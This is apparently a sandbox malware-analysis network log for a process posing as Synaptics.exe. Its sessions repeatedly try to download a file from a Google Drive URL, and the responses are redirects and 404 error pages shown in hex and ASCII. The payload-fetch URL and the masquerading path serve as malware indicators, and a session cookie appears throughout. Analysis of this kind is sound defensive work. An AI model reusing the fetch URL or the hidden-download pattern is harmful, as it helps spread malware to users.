                                                                                                                    2024-12-30 10:26:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 57 68 45 33 4f 6e 62 6f 67 55 4a 4b 6a 6d 68 74 67 6b 6d 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="lWhE3OnbogUJKjmhtgkm0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    131192.168.2.949922142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:05 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    132192.168.2.949924142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:05 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    133192.168.2.949923142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:05 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    134192.168.2.949926142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:06 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:06 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-K4KSnvRuEfSUX3tmXwuUPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    135192.168.2.949927142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:06 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:06 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZbywnSk7ZRYfk5VrPg8BFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    136192.168.2.949931142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:07 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6eu9pUIOG1f-LIet5Si0jCOb38jTUN9qG5EV-e7MODv99GaXU9dIjnIR_JAkl_1hLvwq0OAU0
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:07 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zZFtaERH-_gqlQzQIiVeCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:07 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:26:07 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 37 54 33 6a 54 37 6a 36 71 39 57 65 39 6b 74 74 57 49 6d 2d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="S7T3jT7j6q9We9kttWIm-g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:26:07 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    137192.168.2.949928142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:07 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:07 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5GtcmpD5rgeqP04MNWXXWxWyzwOcMBSe_GVuPnRCNg00-BOXyU0SomSPNEW9tZZDPpFaiqzF4
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:07 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5wSOqklru4bXM1wJhqAqXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:07 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:26:07 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 69 76 59 66 64 32 75 77 56 51 6e 42 44 47 58 71 52 4d 53 4a 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="DivYfd2uwVQnBDGXqRMSJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:26:07 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    138192.168.2.949930142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:07 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:07 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-50EcCqh_5kB_P-0zQ2ElGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    139192.168.2.949929142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:07 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:07 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wTyhOZyF-DlU-fgFu4GMdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    140192.168.2.949935142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:08 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:08 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-SR9C_X5tXGR7TM6rLaeFnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
